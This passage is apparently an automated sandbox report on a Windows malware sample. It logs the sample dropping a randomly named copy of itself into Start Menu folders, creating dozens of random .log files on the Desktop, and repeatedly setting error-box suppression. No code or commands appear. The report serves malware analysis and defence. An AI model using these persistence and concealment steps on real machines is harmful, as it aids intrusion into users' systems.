                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\xjEfhhcu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\qDXyTobI.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vqpwvlrw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TvubsmQz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\KMbLIKLR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sFKgoXgD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kbBrEeQW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZnXAVSVo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\IgGVBfqZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LOtDzcWv.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NQgmULbr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LGJlUtwq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\uztGBGQb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jLOQRvWt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TJILxrgf.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JapvNPbx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\zmLFdDgP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hfuaKQAB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\gajzKhLA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YwaKaovT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\OOHuqLql.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nYXzmwFp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\cehiCBVH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\Mdbejyft.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BpxnzmkL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\rGeXPKfd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZtCSvoKO.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\HhaNcSpz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\yERXsZaS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\grqSYDFD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VDLborKV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vNbglcZZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\lfIQBAUr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RIKKhLUb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BGEGNIeN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ByUnjZDH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\cKWbBtXG.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\Default\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\Default\Start Menu\Programs\System Tools\81acb8af1bb493Jump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Start Menu\Programs\System Tools\81acb8af1bb493Jump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
